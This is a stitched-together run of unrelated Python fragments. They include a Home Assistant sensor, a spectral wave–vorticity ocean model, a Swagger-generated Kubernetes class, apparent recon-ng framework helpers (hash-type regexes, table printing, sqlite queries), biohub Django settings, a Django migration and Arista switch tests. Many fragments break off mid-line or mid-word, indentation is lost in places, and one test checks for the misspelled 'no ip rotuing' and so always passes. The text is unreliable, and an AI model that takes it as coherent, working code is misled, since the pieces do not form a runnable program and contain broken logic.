        """Return the unit the reading is expressed in."""
        return self._unit
    @property
    def icon(self):
        """Return the default icon of the sensor."""
        return "mdi:car"
    @callback
    def async_on_update(self, value):
        """Receive an update."""
        self._state = value
        self.async_schedule_update_ha_state()
|
# Physical parameters specific to the Physical Problem
self.name = name
self.f0 = f0
self.sigma = sigma
self.kappa = kappa
self.meanVisc = meanVisc
self.waveVisc = waveVisc
self.meanViscOrder = meanViscOrder
self.waveViscOrder = waveViscOrder
# Initial routines
## Initialize variables and parameters specific to this problem
self._init_parameters()
self._set_linear_coeff()
self._init_time_stepper()
# Default initial condition.
soln = np.zeros_like(self.soln)
## Default vorticity initial condition: Gaussian vortex
rVortex = self.Lx/20
q0 = 0.1*self.f0 * np.exp( \
- ( (self.XX-self.Lx/2.0)**2.0 + (self.YY-self.Ly/2.0)**2.0 ) \
/ (2*rVortex**2.0) \
)
soln[:, :, 0] = q0
## Default wave initial condition: plane wave. Find closest
## plane wave that satisfies specified dispersion relation.
kExact = np.sqrt(self.alpha)*self.kappa
kApprox = 2.0*pi/self.Lx*np.round(self.Lx*kExact/(2.0*pi))
# Set initial wave velocity to 1
A00 = -self.alpha*self.f0 / (1j*self.sigma*kApprox)
A0 = A00*np.exp(1j*kApprox*self.XX)
soln[:, :, 1] = A0
self.set_physical_soln(soln)
self.update_state_variables()
# Methods - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def describe_physics(self):
        """Print a short human-readable summary of the equations solved."""
        print("""
            This model solves the hydrostatic wave equation and the \n
            two-dimensional vorticity equation simulataneously. \n
            Arbitrary-order hyperdissipation can be specified for both. \n
            There are two prognostic variables: wave amplitude, and mean vorticity.
        """)
    def _set_linear_coeff(self):
        """ Calculate the coefficient that multiplies the linear left hand
        side of the equation """
        # Two-dimensional turbulent part.
        self.linearCoeff[:, :, 0] = self.meanVisc \
            * (self.KK**2.0 + self.LL**2.0)**(self.meanViscOrder/2.0)
        # Wave part: hyperdissipation of the configured order ...
        waveDissipation = self.waveVisc \
            * (self.KK**2.0 + self.LL**2.0)**(self.waveViscOrder/2.0)
        # ... plus the (imaginary) dispersive term.
        waveDispersion = self.alpha*self.kappa**2.0 - self.KK**2.0 - self.LL**2.0
        self.linearCoeff[:, :, 1] = waveDissipation \
            + self.invE*1j*self.alpha*self.sigma*waveDispersion
    def _calc_right_hand_side(self, soln, t):
        """ Calculate the nonlinear right hand side of PDE

        soln: spectral solution array; soln[:, :, 0] is the vorticity
            transform qh and soln[:, :, 1] the wave-amplitude transform Ah.
        t: current time; unused in the body, kept for the time-stepper
            interface.
        """
        # Views for clarity:
        qh = soln[:, :, 0]
        Ah = soln[:, :, 1]
        # Physical-space PV and velocity components
        self.q = np.real(self.ifft2(qh))
        # Derivatives of A in physical space
        self.Ax = self.ifft2(self.jKK*Ah)
        self.Ay = self.ifft2(self.jLL*Ah)
        self.Axx = -self.ifft2(self.KK**2.0*Ah)
        self.Ayy = -self.ifft2(self.LL**2.0*Ah)
        self.Axy = -self.ifft2(self.LL*self.KK*Ah)
        self.EA = -self.ifft2( self.alpha/2.0*Ah*( \
            self.KK**2.0 + self.LL**2.0 \
            + (4.0+3.0*self.alpha)*self.kappa**2.0 ))
        # Calculate streamfunction
        self.psih = -qh / self.divideSafeKay2
        # Mean velocities
        self.U = np.real(self.ifft2(-self.jLL*self.psih))
        self.V = np.real(self.ifft2( self.jKK*self.psih))
        # Views to clarify calculation of A's RHS
        U = self.U
        V = self.V
        q = self.q
        Ax = self.Ax
        Ay = self.Ay
        EA = self.EA
        Axx = self.Axx
        Ayy = self.Ayy
        Axy = self.Axy
        f0 = self.f0
        sigma = self.sigma
        kappa = self.kappa
        # Right hand side for q
        self.RHS[:, :, 0] = -self.jKK*self.fft2(U*q) \
                                -self.jLL*self.fft2(V*q)
        # Right hand side for A, in steps:
        ## 1. Advection term,
        self.RHS[:, :, 1] = -self.invE*( \
            self.jKK*self.fft2(U*EA) + self.jLL*self.fft2(V*EA) )
        ## 2. Refraction term
        self.RHS[:, :, 1] += -self.invE/f0*( \
            self.jKK*self.fft2( q * (1j*sigma*Ax - f0*Ay) ) \
            + self.jLL*self.fft2( q * (1j*sigma*Ay + f0*Ax) ) \
        )
        ## 3. 'Middling' difference Jacobian term.
        self.RHS[:, :, 1] += self.invE*(2j*sigma/f0**2.0)*( \
            self.jKK*self.fft2( V*(1j*sigma*Axy - f0*Ayy) \
                - U*(1j*sigma*Ayy + f0*Axy) ) \
            + self.jLL*self.fft2( U*(1j*sigma*Axy + f0*Axx) \
                - V*(1j*sigma*Axx - f0*Axy) ) \
        )
        # Remove aliased wavenumbers from the freshly computed RHS.
        self._dealias_RHS()
    def _init_parameters(self):
        """ Pre-allocate parameters in memory in addition to the solution """
        # Frequency parameter
        self.alpha = (self.sigma**2.0 - self.f0**2.0) / self.f0**2.0
        # Divide-safe square wavenumber
        self.divideSafeKay2 = self.KK**2.0 + self.LL**2.0
        # Infinity at the mean mode so that dividing by it yields exactly 0.
        self.divideSafeKay2[0, 0] = float('Inf')
        # Inversion of the operator E
        E = -self.alpha/2.0 * \
            ( self.KK**2.0 + self.LL**2.0 + self.kappa**2.0*(4.0+3.0*self.alpha) )
        self.invE = 1.0 / E
        # Prognostic variables  - - - - - - - - - - - - - - - - - - - - - - -
        ## Vorticity and wave-field amplitude
        self.q = np.zeros(self.physVarShape, np.dtype('float64'))
        self.A = np.zeros(self.physVarShape, np.dtype('complex128'))
        # Diagnostic variables - - - - - - - - - - - - - - - - - - - - - - -
        ## Streamfunction transform
        self.psih = np.zeros(self.specVarShape, np.dtype('complex128'))
        ## Mean and wave velocity components
        self.U = np.zeros(self.physVarShape, np.dtype('float64'))
        self.V = np.zeros(self.physVarShape, np.dtype('float64'))
        self.u = np.zeros(self.physVarShape, np.dtype('float64'))
        self.v = np.zeros(self.physVarShape, np.dtype('float64'))
        ## Derivatives of wave field amplitude
        self.Ax = np.zeros(self.physVarShape, np.dtype('complex128'))
        self.Ay = np.zeros(self.physVarShape, np.dtype('complex128'))
        self.EA = np.zeros(self.physVarShape, np.dtype('complex128'))
        self.Axx = np.zeros(self.physVarShape, np.dtype('complex128'))
        self.Ayy = np.zeros(self.physVarShape, np.dtype('complex128'))
        self.Axy = np.zeros(self.physVarShape, np.dtype('complex128'))
    def update_state_variables(self):
        """ Update diagnostic variables to current model state """
        # Views for clarity:
        qh = self.soln[:, :, 0]
        Ah = self.soln[:, :, 1]
        # Streamfunction
        self.psih = - qh / self.divideSafeKay2
        # Physical-space PV and velocity components
        self.A = self.ifft2(Ah)
        self.q = np.real(self.ifft2(qh))
        self.U = -np.real(self.ifft2(self.jLL*self.psih))
        self.V =  np.real(self.ifft2(self.jKK*self.psih))
        # Wave velocities
        uh = -1.0/(self.alpha*self.f0)*( \
            1j*self.sigma*self.jKK*Ah - self.f0*self.jLL*Ah )
        vh = -1.0/(self.alpha*self.f0)*( \
            1j*self.sigma*self.jLL*Ah + self.f0*self.jKK*Ah )
        # Physical wave velocities include the complex conjugate part.
        self.u = np.real( self.ifft2(uh) + np.conj(self.ifft2(uh)) )
        self.v = np.real( self.ifft2(vh) + np.conj(self.ifft2(vh)) )
        # Wave speed magnitude.
        self.sp = np.sqrt(self.u**2.0 + self.v**2.0)
    def set_q(self, q):
        """ Set model vorticity

        q: physical-space vorticity field; it is transformed to spectral
            space, dealiased, and the diagnostic variables are refreshed.
        """
        self.soln[:, :, 0] = self.fft2(q)
        self.soln = self._dealias_array(self.soln)
        self.update_state_variables()
def plot_current_state(self):
""" Create a simple plot that shows the state of the model."""
# Figure out how to do this efficiently.
import matplotlib.pyplot as plt
self.update_state_variables()
# Initialize colorbar dictionary
colorbarProperties = {
'orientation' : 'vertical',
'shrink' : 0.8,
'extend' : 'neither',
}
self. |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1ResourceQuota(object):
    """Swagger-generated model for the Kubernetes v1 ResourceQuota resource.

    NOTE: originally produced by the swagger code generator; the public
    interface (attributes, properties, methods) must stay unchanged.
    """

    def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None):
        """Initialize the model; every field is optional and defaults to None."""
        # attribute name -> swagger type, consumed by to_dict().
        self.swagger_types = {
            'api_version': 'str',
            'kind': 'str',
            'metadata': 'V1ObjectMeta',
            'spec': 'V1ResourceQuotaSpec',
            'status': 'V1ResourceQuotaStatus'
        }
        # attribute name -> JSON key in the API definition.
        self.attribute_map = {
            'api_version': 'apiVersion',
            'kind': 'kind',
            'metadata': 'metadata',
            'spec': 'spec',
            'status': 'status'
        }
        self._api_version = api_version
        self._kind = kind
        self._metadata = metadata
        self._spec = spec
        self._status = status

    def _make_property(attr, doc):
        # Build a plain get/set property over the given private attribute.
        def _get(self):
            return getattr(self, attr)

        def _set(self, value):
            setattr(self, attr, value)

        return property(_get, _set, doc=doc)

    api_version = _make_property(
        '_api_version',
        "APIVersion defines the versioned schema of this representation of "
        "an object.")
    kind = _make_property(
        '_kind',
        "Kind is a string value representing the REST resource this object "
        "represents.")
    metadata = _make_property(
        '_metadata',
        "Standard object's metadata (V1ObjectMeta).")
    spec = _make_property(
        '_spec',
        "Spec defines the desired quota (V1ResourceQuotaSpec).")
    status = _make_property(
        '_status',
        "Status defines the actual enforced quota and its current usage "
        "(V1ResourceQuotaStatus).")

    del _make_property

    def to_dict(self):
        """Return the model's properties as a plain dict."""
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                # Convert model elements; leave plain values untouched.
                result[attr] = [item.to_dict() if hasattr(item, "to_dict") else item
                                for item in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {key: (val.to_dict() if hasattr(val, "to_dict") else val)
                                for key, val in value.items()}
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Return the pretty-printed string form of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Two models are equal when they are the same type with equal state."""
        return isinstance(other, V1ResourceQuota) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self == other
|
cla | ss CreateMapping(object):
def __init__(self):
self.request_id = ''
self.m | apping = '' |
len(header)))
for cmd in cmds:
self.stdout.write("%s %s\n" % (cmd.ljust(15), getattr(self, 'do_' + cmd).__doc__))
self.stdout.write("\n")
#==================================================
# SUPPORT METHODS
#==================================================
    def to_unicode_str(self, obj, encoding='utf-8'):
        # Coerce any object to a unicode string.  Python 2 only: relies on
        # the py2 `basestring` builtin (NameError on Python 3).
        # checks if obj is a string and converts if not
        if not isinstance(obj, basestring):
            obj = str(obj)
        obj = self.to_unicode(obj, encoding)
        return obj
    def to_unicode(self, obj, encoding='utf-8'):
        # Decode a byte string to unicode if needed; non-strings pass through
        # unchanged.  Python 2 only: uses the py2 `unicode` builtin.
        # checks if obj is a unicode string and converts if not
        if isinstance(obj, basestring):
            if not isinstance(obj, unicode):
                obj = unicode(obj, encoding)
        return obj
def is_hash(self, hashstr):
hashdict = [
{'pattern': '^[a-fA-F0-9]{32}$', 'type': 'MD5'},
{'pattern': '^[a-fA-F0-9]{16}$', 'type': 'MySQL'},
{'pattern': '^\*[a-fA-F0-9]{40}$', 'type': 'MySQL5'},
{'pattern': '^[a-fA-F0-9]{40}$', 'type': 'SHA1'},
{'pattern': '^[a-fA-F0-9]{56}$', 'type': 'SHA224'},
{'pattern': '^[a-fA-F0-9]{64}$', 'type': 'SHA256'},
{'pattern': '^[a-fA-F0-9]{96}$', 'type': 'SHA384'},
{'pattern': '^[a-fA-F0-9]{128}$', 'type': 'SHA512'},
{'pattern': '^\$[PH]{1}\$.{31}$', 'type': 'phpass'},
{'pattern': '^\$2[ya]?\$.{56}$', 'type': 'bcrypt'},
]
for hashitem in hashdict:
if re.match(hashitem['pattern'], hashstr):
return hashitem['type']
return False
def get_random_str(self, length):
return ''.join(random.choice(string.lowercase) for i in range(length))
def _is_writeable(self, filename):
try:
fp = open(filename, 'a')
fp.close()
return True
except IOError:
return False
def _parse_rowids(self, rowids):
xploded = []
rowids = [x.strip() for x in rowids.split(',')]
for rowid in rowids:
try:
if '-' in rowid:
start = int(rowid.split('-')[0].strip())
end = int(rowid.split('-')[-1].strip())
xploded += range(start, end+1)
else:
xploded.append(int(rowid))
except ValueError:
continue
return sorted(list(set(xploded)))
#==================================================
# OUTPUT METHODS
#==================================================
    def print_exception(self, line=''):
        # When debug mode is on, print the full traceback framed in red.
        if self._global_options['debug']:
            print('%s%s' % (Colors.R, '-'*60))
            traceback.print_exc()
            print('%s%s' % ('-'*60, Colors.N))
        # Report the last traceback line plus any caller-supplied context.
        line = ' '.join([x for x in [traceback.format_exc().strip().splitlines()[-1], line] if x])
        self.error(line)
    def error(self, line):
        '''Formats and presents errors.'''
        # Ensure the message ends with punctuation and starts capitalized.
        if not re.search('[.,;!?]$', line):
            line += '.'
        line = line[:1].upper() + line[1:]
        print('%s[!] %s%s' % (Colors.R, self.to_unicode(line), Colors.N))
    def output(self, line):
        '''Formats and presents normal output.'''
        # Blue [*] prefix.
        print('%s[*]%s %s' % (Colors.B, Colors.N, self.to_unicode(line)))
    def alert(self, line):
        '''Formats and presents important output.'''
        # Green [*] prefix distinguishes alerts from normal output.
        print('%s[*]%s %s' % (Colors.G, Colors.N, self.to_unicode(line)))
    def verbose(self, line):
        '''Formats and presents output if in verbose mode.'''
        if self._global_options['verbose']:
            self.output(line)
    def debug(self, line):
        '''Formats and presents output if in debug mode (very verbose).'''
        if self._global_options['debug']:
            self.output(line)
    def heading(self, line, level=1):
        '''Formats and presents styled header text'''
        line = self.to_unicode(line)
        print('')
        # Level 0: uppercase title boxed by ruler lines above and below.
        if level == 0:
            print(self.ruler*len(line))
            print(line.upper())
            print(self.ruler*len(line))
        # Level 1: indented title-cased heading underlined with the ruler.
        if level == 1:
            print('%s%s' % (self.spacer, line.title()))
            print('%s%s' % (self.spacer, self.ruler*len(line)))
def table(self, data, header=[], title=''):
'''Accepts a list of rows and outputs a table.'''
tdata = list(data)
if header:
tdata.insert(0, header)
if len(set([len(x) for x in tdata])) > 1:
raise FrameworkException('Row lengths not consistent.')
lens = []
cols = len(tdata[0])
# create a list of max widths for each column
for i in range(0,cols):
lens.append(len(max([self.to_unicode_str(x[i]) if x[i] != None else '' for x in tdata], key=len)))
# calculate dynamic widths based on the title
title_len = len(title)
tdata_len = sum(lens) + (3*(cols-1))
diff = title_len - tdata_len
if diff > 0:
diff_per = diff / cols
lens = [x+diff_per for x in lens]
diff_mod = diff % cols
for x in range(0, diff_mod):
lens[x] += 1
# build ascii table
if len(tdata) > 0:
separator_str = '%s+-%s%%s-+' % (self.spacer, '%s---'*(cols-1))
separator_sub = tuple(['-'*x for x in lens])
separator = separator_str % separator_sub
data_str = '%s| %s%%s |' % (self.spacer, '%s | '*(cols-1))
# top of ascii table
print('')
print(separator)
# ascii table data
if title:
print('%s| %s |' % (self.spacer, title.center(tdata_len)))
print(separator)
if header:
rdata = tdata.pop(0)
data_sub = tuple([rdata[i].center(lens[i]) for i in range(0,cols)])
print(data_str % data_sub)
print(separator)
for rdata in tdata:
data_sub = tuple([self.to_unicode_str(rdata[i]).ljust(lens[i]) if rdata[i] != None else ''.ljust(lens[i]) for i in range(0,cols)])
print(data_str % data_sub)
# bottom of ascii table
print(separator)
print('')
#==================================================
# DATABASE METHODS
#==================================================
def query(self, query, values=(), p | ath=''):
'''Queries the database and returns the results as a list.'''
if not path:
path = os.path.join(self.workspace, 'data.db')
self.debug('DATABASE => %s' % (path))
self.debug('QUERY => %s' % (query))
with sqlite3.connect(path) as conn:
with closing(conn.cursor()) as cur:
if values:
self.debug('VALUES => %s' % (repr(values)))
| cur.execute(query, values)
else:
cur.execute(query)
# a rowcount of -1 typically refers to a select statement
if cur.rowcount == -1:
rows = cur.fetchall()
results = rows
# a rowcount of 1 == success and 0 == failure
else:
conn.commit()
results = cur.rowcount
return results
def get_columns(self, table):
return [(x[1],x[2]) for x in self.query('PRAGMA table_info(\'%s\')' % (table))]
def get_tables(self):
return [x[0] for x in self.query('SELECT name FROM sqlite_master WHERE type=\'table\'') if x[0] not in ['dashboard']]
#==================================================
# ADD METHODS
#==================================================
def add_netblocks(self, netblock=None):
'''Adds a netblock to the database and returns the affected row count.'''
data = dict(
netblock = self.to_unicode(netblock)
)
return self.insert('netblocks', data, data.keys())
def add_ports(self, ip_address=None, host=None, port=None, protocol=None):
|
n
import filelock
import tempfile
import logging
import warnings
import multiprocessing
from django.core.exceptions import ImproperlyConfigured
from django.utils.functional import LazyObject, empty
from biohub.utils.collections import unique
from biohub.utils.module import is_valid_module_path
logger = logging.getLogger('biohub.conf')
# Environment variable naming the biohub config file path.
CONFIG_ENVIRON = 'BIOHUB_CONFIG_PATH'
# Cross-process lock file guarding config reads/writes.
LOCK_FILE_PATH = os.path.join(tempfile.gettempdir(), 'biohub.config.lock')
# Field mapping for biohub settings
# Format: dest_name -> (org_name, default)
mapping = {
    'DEFAULT_DATABASE': ('DATABASE', dict),
    'BIOHUB_PLUGINS': ('PLUGINS', list),
    'TIMEZONE': ('TIMEZONE', 'UTC'),
    'UPLOAD_DIR': ('UPLOAD_DIR', lambda: os.path.join(tempfile.gettempdir(), 'biohub')),
    'REDIS_URI': ('REDIS_URI', ''),
    'SECRET_KEY': ('SECRET_KEY', ''),
    'BIOHUB_MAX_TASKS': ('MAX_TASKS', lambda: multiprocessing.cpu_count() * 5),
    'BIOHUB_TASK_MAX_TIMEOUT': ('TASK_MAX_TIMEOUT', 180),
    'EMAIL': ('EMAIL', dict),
    'CORS': ('CORS', list),
    'ES_URL': ('ES_URL', 'http://127.0.0.1:9200/'),
    'THROTTLE': ('THROTTLE', lambda: {
        'rate': 15,
        'experience': 86400,
        'post': 15,
        'vote': 15,
        'register': 3600
    }),
    'PLUGINS_DIR': ('PLUGINS_DIR', lambda: os.path.join(tempfile.gettempdir(), 'biohub_plugins'))
}
# The protected attribute names are the mapping KEYS (dest names).
# Fixed: the original used tuple(mapping.values()), which yields
# (org_name, default) tuples that can never match an attribute name in
# Settings.__delattr__, silently disabling the delete protection.
valid_settings_keys = tuple(mapping)
class BiohubSettingsWarning(RuntimeWarning):
    """Warning category for suspicious or missing biohub configuration."""
class Settings(object):
    """
    The core settings class, which can validate, store, serialize/deserialze
    biohub relevant configuration items.
    """

    def _validate(self, key, value, default):
        """
        A proxy function for validation, which will find `validate_<key>`
        method in self and feed `value` to it if the method exists. The
        validation methods should return the validated value.
        """
        validate_func = getattr(
            self, 'validate_%s' % key.lower(), None)
        if validate_func is not None:
            value = validate_func(value, default)
        return value

    def _set_settings_values(self, source=None):
        """
        Validate and store configuration items specified by `source` (a dict).
        If source is `None`, the function will use default values to fill up
        unset configuration items.
        """
        if source is None:
            # Only fill attributes that have not been set yet.
            for dest_name, (org_name, default_value) in mapping.items():
                if not hasattr(self, dest_name):
                    value = default_value() if callable(default_value) \
                        else default_value
                    setattr(self, dest_name, value)
            return
        for dest_name, (org_name, default_value) in mapping.items():
            value = source.get(org_name, None)
            if value is None:
                value = default_value() if callable(default_value) \
                    else default_value
            value = self._validate(dest_name, value, default_value)
            setattr(self, dest_name, value)

    def dump_settings_value(self):
        """
        Return a dict of gathered configuration items, keyed by their
        original (config-file) names.
        """
        result = {}
        for dest_name, (org_name, default) in mapping.items():
            value = getattr(self, dest_name)
            value = self._validate(dest_name, value, default)
            result[org_name] = value
        return result

    def validate_biohub_plugins(self, value, default):
        """
        BIOHUB_PLUGINS should not contains duplicated items; unimportable
        plugin modules are skipped with a warning.
        """
        result = []
        for item in unique(value):
            if not is_valid_module_path(item, try_import=True):
                warnings.warn(
                    "Module '%s' not found. Skipped." % item,
                    BiohubSettingsWarning
                )
            else:
                result.append(item)
        return result

    def validate_redis_uri(self, value, default):
        """Warn (but accept) when no redis URI is configured."""
        if not value:
            warnings.warn(
                'No redis configuration provided, redis-based services '
                'will be disabled.', BiohubSettingsWarning)
        return value

    def validate_secret_key(self, value, default):
        """Warn (but accept) when no secret key is configured."""
        if not value:
            warnings.warn(
                'No secret key provided, default value used instead.',
                BiohubSettingsWarning)
        return value

    def validate_biohub_max_tasks(self, value, default):
        """MAX_TASKS must be a positive integer."""
        assert isinstance(value, int) and value > 0, \
            "'MAX_TASKS' should be positive integer."
        return value

    def validate_biohub_task_max_timeout(self, value, default):
        """TASK_MAX_TIMEOUT must be a positive number (seconds)."""
        assert isinstance(value, (int, float)) and value > 0, \
            "'TASK_MAX_TIMEOUT' should be positive float."
        return value

    def validate_upload_dir(self, value, default):
        """Warn when the upload dir lives in tmp; return its absolute path."""
        if value.startswith(tempfile.gettempdir()):
            warnings.warn(
                'Your UPLOAD_DIR is within the temporary directory. All '
                'files will be erased once system reboots.',
                BiohubSettingsWarning)
        return os.path.abspath(value)

    def validate_plugins_dir(self, value, default):
        """Ensure the plugins dir exists and is importable; return abspath."""
        if value.startswith(tempfile.gettempdir()):
            warnings.warn(
                'Your PLUGINS_DIR is within the temporary directory. All '
                'files will be erased once system reboots.',
                BiohubSettingsWarning)
        try:
            os.makedirs(value)
        except OSError:
            # Best effort: the directory may already exist.
            pass
        # NOTE(review): the (possibly relative) value is appended to
        # sys.path while the absolute path is returned -- confirm intended.
        sys.path.append(value)
        return os.path.abspath(value)

    def validate_email(self, value, default):
        """EMAIL must be a dict; missing required fields default to ''."""
        if not isinstance(value, dict):
            # Fixed: report the value's own type; the original passed
            # type(type(value)), which always rendered <class 'type'>.
            raise TypeError("'EMAIL' should be a dict, got type %r." % type(value))
        required = 'HOST HOST_USER HOST_PASSWORD PORT'.split()
        missing = set(required) - set(value)
        if missing:
            warnings.warn(
                'Fields %s not found in EMAIL, which may affect email related services.'
                % ', '.join(missing), BiohubSettingsWarning)
            for field in missing:
                value[field] = ''
        return value

    def validate_throttle(self, value, default):
        """THROTTLE must be a dict; user values overlay the defaults."""
        if not isinstance(value, dict):
            # Fixed: same type(type(value)) defect as validate_email.
            raise TypeError("'THROTTLE' should be a dict, got type %r." % type(value))
        default_value = default()
        default_value.update(value)
        return default_value

    def __delattr__(self, name):
        """
        Configuration items should be protected.
        """
        if name in valid_settings_keys:
            raise KeyError(
                "Can't delete a configuration item.")
        super(Settings, self).__delattr__(name)
class LazySettings(LazyObject):
    """
    A proxy to settings object. Settings will not be loaded until it is
    accessed.
    """
    def __init__(self):
        # The manager wraps the real Settings object and performs loading.
        self._manager = SettingsManager(Settings())
        super(LazySettings, self).__init__()
    @property
    def configured(self):
        """
        Returns a boolean indicating whether the settings is loaded.
        """
        return self._wrapped is not empty
    def _setup(self):
        # First access: point _wrapped at the real settings object, then
        # let the manager populate it.
        self._wrapped = self._manager._settings_object
        self._manager.load()
    def __getattr__(self, name):
        if self._wrapped is empty:
            self._setup()
        # Prefer manager attributes; fall back to the settings object.
        val = getattr(self._manager, name, None)
        if val is None:
            val = getattr(self._wrapped, name)
        return val
    def __setattr__(self, name, value):
        # '_manager' must bypass LazyObject's proxying machinery entirely.
        if name == '_manager':
            self.__dict__['_manager'] = value
            return
        self.__dict__.pop(name, None)
        super(LazySettings, self).__setattr__(name, value)
    def __delattr__(self, name):
        raise AttributeError('Not allowed to remove a settings attribute.')
class SettingsManager(object):
def __init__(self, settings_object):
self._settings_object = settings_object
self._file_lock = filelock.FileLock(LOCK_FILE_PATH)
self._store_settings = []
@property
def locking(self):
return self._file_lock.is_locke |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Creates the Event model: location, date_time and a FK to artist.Artist.
    dependencies = [
        ('artist', '0002_auto_20150322_1630'),
    ]
    operations = [
        migrations.CreateModel(
            name='Event',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('location', models.CharField(max_length=500, verbose_name='Location')),
                ('date_time', models.DateTimeField(verbose_name='Date & Time')),
                ('artist', models.ForeignKey(to='artist.Artist')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
|
# -*- | coding: utf-8 -*-
"""template tags | """ |
# encoding: u | tf8 | |
rs may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL ARISTA NETWORKS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import unittest
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../lib'))
from testlib import random_string
from systestlib import DutSystemTest
class TestApiSystem(DutSystemTest):
    def test_get(self):
        """get() on a defaulted hostname returns exactly the expected keys."""
        for dut in self.duts:
            dut.config('default hostname')
            resp = dut.api('system').get()
            keys = ['hostname', 'iprouting', 'banner_motd', 'banner_login']
            self.assertEqual(sorted(keys), sorted(resp.keys()))
    def test_get_with_period(self):
        """A dotted FQDN hostname is returned intact by get()."""
        for dut in self.duts:
            dut.config('hostname host.domain.net')
            response = dut.api('system').get()
            self.assertEqual(response['hostname'], 'host.domain.net')
    def test_get_check_hostname(self):
        """A configured hostname is reflected in get()."""
        for dut in self.duts:
            dut.config('hostname teststring')
            response = dut.api('system').get()
            self.assertEqual(response['hostname'], 'teststring')
    def test_get_check_banners(self):
        """Configured motd/login banners come back via get() (sans newline)."""
        for dut in self.duts:
            motd_banner_value = random_string() + "\n"
            login_banner_value = random_string() + "\n"
            dut.config([dict(cmd="banner motd", input=motd_banner_value)])
            dut.config([dict(cmd="banner login", input=login_banner_value)])
            resp = dut.api('system').get()
            self.assertEqual(resp['banner_login'], login_banner_value.rstrip())
            self.assertEqual(resp['banner_motd'], motd_banner_value.rstrip())
    def test_get_banner_with_EOF(self):
        """Multiline banners containing '!!!' markers survive a round trip."""
        for dut in self.duts:
            motd_banner_value = '!!!newlinebaner\nSecondLIneEOF!!!newlinebanner\n'
            dut.config([dict(cmd="banner motd", input=motd_banner_value)])
            resp = dut.api('system').get()
            self.assertEqual(resp['banner_motd'], motd_banner_value.rstrip())
    def test_set_hostname_with_value(self):
        """set_hostname(value) writes 'hostname <value>' to running-config."""
        for dut in self.duts:
            dut.config('default hostname')
            value = random_string()
            response = dut.api('system').set_hostname(value)
            self.assertTrue(response, 'dut=%s' % dut)
            value = 'hostname %s' % value
            self.assertIn(value, dut.running_config)
    def test_set_hostname_with_no_value(self):
        """set_hostname(disable=True) negates the hostname command."""
        for dut in self.duts:
            dut.config('hostname test')
            response = dut.api('system').set_hostname(disable=True)
            self.assertTrue(response, 'dut=%s' % dut)
            value = 'no hostname'
            self.assertIn(value, dut.running_config)
    def test_set_hostname_with_default(self):
        """set_hostname(default=True) restores the default (no hostname)."""
        for dut in self.duts:
            dut.config('hostname test')
            response = dut.api('system').set_hostname(default=True)
            self.assertTrue(response, 'dut=%s' % dut)
            value = 'no hostname'
            self.assertIn(value, dut.running_config)
    def test_set_hostname_default_over_value(self):
        """default=True takes precedence over an explicit value."""
        for dut in self.duts:
            dut.config('hostname test')
            response = dut.api('system').set_hostname(value='foo', default=True)
            self.assertTrue(response, 'dut=%s' % dut)
            value = 'no hostname'
            self.assertIn(value, dut.running_config)
def test_set_iprouting_to_true(self):
for dut in self.duts:
dut.config('no ip routing')
resp = dut.api('system').set_iprouting(True)
self.assertTrue(resp, 'dut=%s' % dut)
self.assertNotIn('no ip rotuing', dut.running_config)
    def test_set_iprouting_to_false(self):
        """set_iprouting(False) puts 'no ip routing' in running-config."""
        for dut in self.duts:
            dut.config('ip routing')
            resp = dut.api('system').set_iprouting(False)
            self.assertTrue(resp, 'dut=%s' % dut)
            self.assertIn('no ip routing', dut.running_config)
    def test_set_iprouting_to_no(self):
        """set_iprouting(disable=True) negates ip routing."""
        for dut in self.duts:
            dut.config('ip routing')
            resp = dut.api('system').set_iprouting(disable=True)
            self.assertTrue(resp, 'dut=%s' % dut)
            self.assertIn('no ip routing', dut.running_config)
    def test_set_iprouting_to_default(self):
        """set_iprouting(default=True) restores the default (disabled)."""
        for dut in self.duts:
            dut.config('ip routing')
            resp = dut.api('system').set_iprouting(default=True)
            self.assertTrue(resp, 'dut=%s' % dut)
            self.assertIn('no ip routing', dut.running_config)
    def test_set_hostname_with_period(self):
        """set_hostname accepts a dotted FQDN value."""
        for dut in self.duts:
            dut.config('hostname localhost')
            response = dut.api('system').set_hostname(value='host.domain.net')
            self.assertTrue(response, 'dut=%s' % dut)
            value = 'hostname host.domain.net'
            self.assertIn(value, dut.running_config)
    def test_set_banner_motd(self):
        """set_banner('motd', ...) replaces an existing motd banner."""
        for dut in self.duts:
            banner_value = random_string()
            dut.config([dict(cmd="banner motd",
                             input=banner_value)])
